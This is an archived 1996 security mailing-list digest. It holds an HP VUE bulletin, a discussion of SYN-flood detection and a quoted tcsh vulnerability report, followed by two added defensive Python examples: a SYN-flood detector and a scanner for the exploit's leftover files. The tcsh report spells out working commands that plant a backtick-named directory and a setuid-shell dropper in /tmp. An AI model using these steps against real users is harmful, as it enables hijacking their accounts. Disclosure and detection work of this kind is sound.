From hargiss@michelob.wustl.edu Sat Sep 14 15:51:54 1996
Received: from bitcom.ch ([193.192.228.9]) by suburbia.net (8.7.4/Proff-950810) with SMTP id PAA03363 for ; Sat, 14 Sep 1996 15:51:44 +1000
Date: Sat, 14 Sep 1996 15:51:44 +1000
From: hargiss@michelob.wustl.edu
Message-Id: <199609140551.PAA03363@suburbia.net>
Received: from [193.192.228.39] by bitcom.ch (SMTPD32-3.00) id A82E39250234; Sat Sep 14 07:52:46 1996
Received: by scout.net (Amiga SMTPpost 1.04 December 9, 1994) id AA01; Sat, 14 Sep 96 07:52:49 CET
To: best-of-security@suburbia.net
Organization: The Global ScoutNet Organization

===============================================================================
                   ***HP SupportLine Mail Service Notice***

This digest contains a summary of all newly received Security Bulletins.
You do not have to have any form of support from Hewlett-Packard to
subscribe to this digest or to procure the recommended patches via the
HP SupportLine mail service.
[...]cessary to obtain additional information.
-------------------------------------------------------------------------------
If you would like to be REMOVED from this mailing list, send the following
(in the TEXT PORTION OF THE MESSAGE) to the HP SupportLine mail service.
    To: support@us.external.hp.com
    Message Text: unsubscribe security_info
===============================================================================
Digest Name:  security_info
Description:  Daily Security Bulletins Digest
Created:      Thu Sep 12 16:46:16 1996 PDT
-------------------------------------------------------------------------------
Summary of 'Daily Security Bulletins Digest' documents
-------------------------------------------------------------------------------
Document Id      Description                                            Page 1
-------------------------------------------------------------------------------
HPSBUX9609-038   Security Vulnerability in HP VUE3.0
===============================================================================
Detailed list of 'Daily Security Bulletins Digest' documents
===============================================================================
Document Id:  [HPSBUX9609-038]
Date Loaded:  [09-12-96]
Description:  Security Vulnerability in HP VUE3.0
===============================================================================
-------------------------------------------------------------------------
     HEWLETT-PACKARD SECURITY BULLETIN: HPSBUX9609-038, 10 September 1996
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible.  Hewlett Packard will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM:  Using Vue 3.0 on only HP-UX releases 10.01 and 10.10 it is
          possible to increase privileges and launch denial of service
          attacks.
PLATFORM: HP 9000 series 700/800 systems running only versions 10.01 and
          [...]
[...]nstructions are contained within the patches.

D.
To subscribe to automatically receive future NEW HP Security Bulletins
from the HP SupportLine mail service via electronic mail, send an email
message to:

    support@us.external.hp.com  (no Subject is required)

Multiple instructions are allowed in the TEXT PORTION OF THE MESSAGE;
here are some basic instructions you may want to use:

To add your name to the subscription list for new security bulletins,
send the following in the TEXT PORTION OF THE MESSAGE:

    subscribe security_info

To retrieve the index of all HP Security Bulletins issued to date, send
the following in the TEXT PORTION OF THE MESSAGE:

    send security_info_list

To get a patch matrix of current HP-UX and BLS security patches
referenced by either Security Bulletin or Platform/OS, put the following
in the text portion of your message:

    send hp-ux_patch_matrix

World Wide Web service for browsing of bulletins is available via our
URL: (http://us.external.hp.com)
Choose "Support news", then under Support news, choose "Security Bulletins"

E. To report new security vulnerabilities, send email to
   security-alert@hp.com

   Please encrypt exploit information using the security-alert PGP key,
   available from your local key server, or by sending a message with a
   -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com.

Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin is not
edited or changed in any way, is attributed to HP, and provided such
reproduction and/or distribution is performed for non-commercial
purposes.  Any other use of this information is prohibited.  HP is not
liable for any misuse of this information by any third party.
________________________________________________________________________

>From dsaxer Sat, 14 Sep 96 06:13:16 CET remote from scout.net
Received: from pdx1.world.net by scout.net (AmigaSMTPd 0.69 Dec 9, 1994) with SMTP; Sat, 14 Sep 96 06:13:12 CET
Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id VAA05025; Fri, 13 Sep 1996 21:11:07 -0700 (PDT)
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA21086; Sat, 14 Sep 1996 11:11:47 +1000
Resent-Date: Sat, 14 Sep 1996 11:11:47 +1000
From: Nate Lawson
Message-Id: <199609140108.SAA13467@kdat.calpoly.edu>
Date: Fri, 13 Sep 1996 18:08:21 -0700 (PDT)
In-Reply-To: <19960913201635.2522.qmail@onyx.infonexus.com> from "route@onyx.infonexus.com" at Sep 13, 96 01:16:35 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Resent-Message-ID: <"xGrOA.0.H95.7PWEo"@suburbia>
Resent-From: best-of-security@suburbia.net
X-Mailing-List: archive/latest/365
X-Loop: best-of-security@suburbia.net
Precedence: list
Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: Tool for stopping SYN floods
To: route@onyx.infonexus.com
Cc: best-of-security@suburbia.net

> | With the routers for most ISPs, they should be blocking any non-internal
> | addresses from leaving their network and going to the Internet.  This will
> | stop an attacker if their ISP implements this.  Unfortunately, this does
> | not stop an attack from areas on the Internet that do not block that.

But the key part is doing careful traffic analysis.  Any type of denial of
service attack, no matter how random the headers, will fit into a very
specific category.  In fact, the randomness of the header can be a
signature in itself.

> Neither of these is ideal.  The first scenario destroys the anonymity
> of the attack.  The second adds much complexity to an otherwise
> simple DOS attack.
Both of them destroy the anonymity of the attack by limiting the source of
the attack to one very specific network.  At present, attacks have to be
traced back through the NAPs.  This requires manual analysis, time, and
extra [...]

[...]SYN floods:

> >Kernel mod or daemon that will:
> -listen for all incoming SYNs
> -keep a list of the x most recent incoming SYNs (x=backlog?)

This is already done to handle the incoming requests.

> -if x amount of connection-requests take more than y amount of time
>  to complete and(other heuristics)

This is what the mentioned product does (among other things).

> -x SYNs arrived in z time relative to each other.
> -x SYNs have a,b,c features in common (source IP addr,TTL,port,seq#)
> -etc...

T[...]

________________________________________________________________________

Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id VAA05040; Fri, 13 Sep 1996 21:11:25 -0700 (PDT)
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA28410; Sat, 14 Sep 1996 11:50:30 +1000
Received: from bitcom.ch ([193.192.228.9]) by suburbia.net (8.7.4/Proff-950810) with SMTP id LAA28374 for ; Sat, 14 Sep 1996 11:49:41 +1000
Date: Sat, 14 Sep 1996 11:49:41 +1000
From: soth@soth.users.mindspring.com
Message-Id: <199609140149.LAA28374@suburbia.net>

[...]ic consumption:

> > I feel it is highly suspicious that you should release a tool for RST'ing SYN
> > flooding attacks, at roughly the same time a hacker magazine (which one of
> > your employees edits) releases code for the above mentioned attacks.

Have you considered that maybe they bumped up the production schedule to get
something out to protect against it?  Also note the evaluation is FREE!!!!!
(although I expect they will overcharge for it like their other products).

> >

________________________________________________________________________

[...] NAA07751; Sat, 14 Sep 1996 13:51:24 +1000
Resent-Date: Sat, 14 Sep 1996 13:51:24 +1000
Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT)
From: "Michael J. Hartwick"
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Resent-Message-ID: <"5v-En1.0.vu1.jkYEo"@suburbia>
Resent-From: best-of-security@suburbia.net
X-Mailing-List: archive/latest/367
X-Loop: best-of-security@suburbia.net

------
jim# whoami
root
jim# echo $SHELL
/bin/bash
jim# I just like to check that sometimes.
jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim# cd /tmp
jim# ls
`source .WaReZ`
jim# OH BOY!!! the jack pot!
jim# cd *WaReZ*
jim# ls
jim# oh, oh well maybe I'll check later...
jim# cd
----------------------------Cut to More Bad guy--------------------------
jim% bash
#whoami
root
# hah.
---------------------------End Unix Parable-------------------------------

On Fri, 13 Sep 1996, test wrote:

>A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
>out with BSDI anyway.) that allows the execution of arbitrary commands
>when changing into directories that are enclosed with back ticks.  The
>problem might also prove to be quite bad to tcsh scripts that find
>themselves changing into directories on the fly.
>
>Here is probably one of the dumbest methods possible that could be used to
>exploit this weakness.
>
>----------------------------Cut to Bad guy--------------------------------
>
>jim% whoami
>Evol bad guy
>jim% mkdir /tmp/\`source\ .WaReZ\`
>jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
>jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
>jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
>jim% chmod +x /tmp/*W*/.WaReZ
>
>---------------------------Cut to unsuspecting foo------------------------
>
>jim% whoami
>Unsuspecting foo
>jim% echo $SHELL
>/bin/tcsh
>jim% I just like to check that sometimes.
>jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
>jim% cd /tmp
>jim% ls
>
>`source .WaReZ`
>
>jim% OH BOY!!! the jack pot!
>jim% cd *WaReZ*
>jim% ls
>
>jim% oh, oh well maybe I'll check later...
>jim% cd $HOME
>
>----------------------------Cut to More Bad guy--------------------------
>
>jim% ls -a /tmp/*W*/
>
>.
>..
>.24753
>
>jim% /tmp/*W*/.24753
>$whoami
>unsuspecting foo
>$ hah.
>---------------------------End Unix Parable-------------------------------
>
----------------------------------------------------------------------------

[...] 13 Sep 1996 19:21:52 -0700 (PDT)
Message-Id: <199609140221.TAA02619@pdx1.world.net>
Received: from [193.192.228.39] by bitcom.ch (SMTPD32-3.00) id A6C39AB0264; Sat Sep 14 04:21:55 1996
Received: by scout.net (Amiga SMTPpost 1.04 December 9, 1994) id AA01; Sat, 14 Sep 96 04:21:56 CET
[...]ity@suburbia.net> archive/latest/353
X-Loop: best-of-security@suburbia.net
Precedence: list
Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: Attacks against NetBIOS via TCP/IP
To: BUGTRAQ@NETSPACE.ORG, best-of-security@suburbia.net

[...]at, 14 Sep 96 03:10:16 CET
[...]ct:

ISS has been developing the technology for real-time attack recognition
and response (RealSecure) for over twelve months.  In collaboration with
our customers, universities, and our partners, ISS has undertaken a
significant investment in time and resources to deliver a comprehensive
tool to detect numerous kinds of attacks, only one of which is the SYN
[...]

[...]d the (heavily UNIX-inclined)
>security guys :-)
>
>--
>> Bernd Lehle - Stuttgart University Computer Center * A supercomputer <

[...] by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA12706 for ; Fri, 13 Sep 1996 07:15:13 +1000
[...]d.net by scout.net (AmigaSMTPd 0.69 Dec 9, 1994) with SMTP; Sat, 14 Sep 96 03:58:27 CET
Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id OAA27166 for ; Thu, 12 Sep 1996 14:15:52 -0700 (PDT)
From: best-of-security-request@suburbia.net
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id HAA12743 for Tiago.Franco@Scout.Net; Fri, 13 Sep 1996 07:15:37 +1000

[...]rmation hasn't appeared on this list yet, then SEND IT.
It is far better to run the risk of minor duplication in exchange for
having the information out where it is needed than to act conservatively
about occasional doubling up on content.  We do, of course, take original
posts.  In the famous last words of Marilyn Monroe, CORE Digest and
Joachim Kroll: "meat, we want meat".

[...]s such as Blond jokes.
[...] those on the ethics of full NEW or hard to obtain security disclosure
or computer hackers.

[...]u have to consider we're only made out of dust.  That's admittedly not
much to go on and we shouldn't forget that.  But even considering, I mean
it's sort of a bad beginning, we're not doing too bad.  So I personally
have faith that even in this lousy situation we're faced with we can make
it.  You get me?"
                                                        - Leo Burlero/PKD

+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+
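The SYN flood thread above sketches a detector in four bullet points (the x most recent SYNs, requests that take more than y seconds to complete, x SYNs within z seconds, SYNs sharing header features) without showing one. The following is an added example, written for this page; it is not code from the thread, from Nate Lawson, or from any product mentioned there. The Pkt record, the thresholds x=8, y=3 s and z=1 s, and the packet traces (documentation address ranges, no real hosts) are constructed for the demonstration.

```python
"""Toy SYN-flood detector over a constructed packet trace (added example).

Implements the heuristics the thread sketches: keep the x most recent SYNs,
count half-open connections unanswered for more than y seconds, flag x SYNs
arriving within z seconds, and flag a burst whose SYNs share TTL and port
while the source address never repeats (what spoofed, randomised sources
look like).  Thresholds and the trace below are assumptions for the demo.
"""
from collections import Counter, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float      # seconds, relative to trace start
    src: str
    sport: int
    dst: str
    dport: int
    ttl: int
    flags: str     # "S" SYN, "A" ACK (handshake completed), "R" RST


class SynFloodDetector:
    def __init__(self, x=8, y=3.0, z=1.0):
        self.x, self.y, self.z = x, y, z
        self.recent = deque(maxlen=x)   # the x most recent inbound SYNs
        self.half_open = {}             # 4-tuple -> timestamp of its SYN
        self.alerts = []                # (kind, ts, count)

    def feed(self, p):
        key = (p.src, p.sport, p.dst, p.dport)
        if p.flags == "S":
            self.half_open[key] = p.ts
            self.recent.append(p)
            self._check(p.ts)
        elif p.flags in ("A", "R"):
            # third handshake packet or reset: the entry is no longer half-open
            self.half_open.pop(key, None)

    def _check(self, now):
        # 1. at least x half-open entries older than y seconds
        stale = sum(1 for t in self.half_open.values() if now - t > self.y)
        if stale >= self.x:
            self.alerts.append(("stale_half_open", now, stale))
        # 2. the last x SYNs all arrived within z seconds of each other
        if len(self.recent) == self.x and now - self.recent[0].ts <= self.z:
            self.alerts.append(("syn_rate", now, self.x))
            # 3. same TTL and port on every SYN, but a different source each time.
            #    Busy servers see many distinct sources too, so this is only
            #    evaluated inside a burst that already tripped the rate check.
            ttls = Counter(p.ttl for p in self.recent)
            ports = Counter(p.dport for p in self.recent)
            srcs = {p.src for p in self.recent}
            if (len(srcs) == self.x and ttls.most_common(1)[0][1] == self.x
                    and ports.most_common(1)[0][1] == self.x):
                self.alerts.append(("spoofed_random_src", now, self.x))


def detect(trace, x=8, y=3.0, z=1.0):
    """Run the detector over an iterable of Pkt and return the alert list."""
    d = SynFloodDetector(x, y, z)
    for p in trace:
        d.feed(p)
    return d.alerts


def alert_kinds(trace, **kw):
    return sorted({kind for kind, _, _ in detect(trace, **kw)})


def benign_trace():
    """Constructed: two ordinary handshakes that complete promptly."""
    return [Pkt(0.0, "10.0.0.5", 40001, "192.0.2.10", 80, 64, "S"),
            Pkt(0.1, "10.0.0.5", 40001, "192.0.2.10", 80, 64, "A"),
            Pkt(0.5, "10.0.0.7", 40002, "192.0.2.10", 80, 128, "S"),
            Pkt(0.6, "10.0.0.7", 40002, "192.0.2.10", 80, 128, "A")]


def flood_trace():
    """Constructed: the benign traffic, then a spoofed burst, then a late SYN."""
    trace = benign_trace()
    # eight SYNs in 0.35 s, a new source each, identical TTL and port, never
    # followed by an ACK: the burst a spoofing flooder produces
    for i in range(8):
        trace.append(Pkt(2.0 + 0.05 * i, f"198.51.100.{i + 1}", 1024 + i,
                         "192.0.2.10", 80, 64, "S"))
    # a legitimate SYN eight seconds later; the eight above are still unanswered
    trace.append(Pkt(10.0, "10.0.0.9", 40003, "192.0.2.10", 80, 64, "S"))
    return trace


if __name__ == "__main__":
    for kind, ts, n in detect(flood_trace()):
        print(f"{ts:6.2f}s  {kind:20s} n={n}")
```

On the flood trace the rate check fires on the eighth burst SYN, the feature check fires at the same instant because every source is new while TTL and port never vary, and the stale check fires only when the next SYN arrives and finds the burst still unanswered; the benign trace produces nothing. The feature check is deliberately nested under the rate check, since distinct sources alone are what any popular server sees.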
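The tcsh report above turns on two artefacts an administrator of a shared system can look for: a directory under /tmp whose name contains backticks, and the setuid shell wrapper the sourced script leaves behind. The scanner below is an added example for this page, not code from any post in the thread; it does not model the shell's behaviour, it only finds the artefacts. The demo tree (a `source .WaReZ` directory holding a stand-in .WaReZ script and a .24753 wrapper) is constructed inside a scratch directory, and the SUSPICIOUS character set is an assumption.

```python
"""Scan a tree for names a shell could evaluate, and for setuid files.

Added example, not code from the list thread.  Builds a throwaway copy of
the layout from the tcsh report, then walks it.  Nothing is read from /tmp
and the planted script is never executed.
"""
import os
import shutil
import stat
import tempfile

# Characters that backtick/dollar substitution, command separators or word
# splitting act on.  None of them is needed in an ordinary file name.
SUSPICIOUS = frozenset("`$;|&\n")


def scan_tree(root):
    """Return (kind, path) findings for every suspicious entry under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if SUSPICIOUS & set(name):
                findings.append(("unsafe_name", path))
            try:
                st = os.lstat(path)      # lstat: do not follow planted symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(("setuid_file", path))
    return findings


def build_demo_tree():
    """Recreate the layout from the report inside a scratch directory (constructed)."""
    root = tempfile.mkdtemp(prefix="tcsh-demo-")
    trap = os.path.join(root, "`source .WaReZ`")
    os.mkdir(trap)
    script = os.path.join(trap, ".WaReZ")
    with open(script, "w") as f:
        # stand-in for what the report's three echo lines produce; never run here
        f.write("echo #!/bin/sh > .$$\necho sh > .$$\nchmod 4755 .$$\n")
    os.chmod(script, 0o755)
    # the artefact that script leaves once a victim has cd'd in: a setuid
    # wrapper named after the victim shell's pid (.24753 in the report)
    leftover = os.path.join(trap, ".24753")
    with open(leftover, "w") as f:
        f.write("sh\n")
    os.chmod(leftover, 0o4755)   # bit is kept in the mode even on nosuid mounts
    return root


def setuid_bit_set(path):
    return bool(os.lstat(path).st_mode & stat.S_ISUID)


def remove_demo_tree(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    demo = build_demo_tree()
    try:
        for kind, path in scan_tree(demo):
            print(kind, repr(path))
    finally:
        remove_demo_tree(demo)
```

Paths are printed with repr() so that a backtick or newline in a name is visible rather than handed to whatever shell reads the report; the scanner itself never passes a name through a shell.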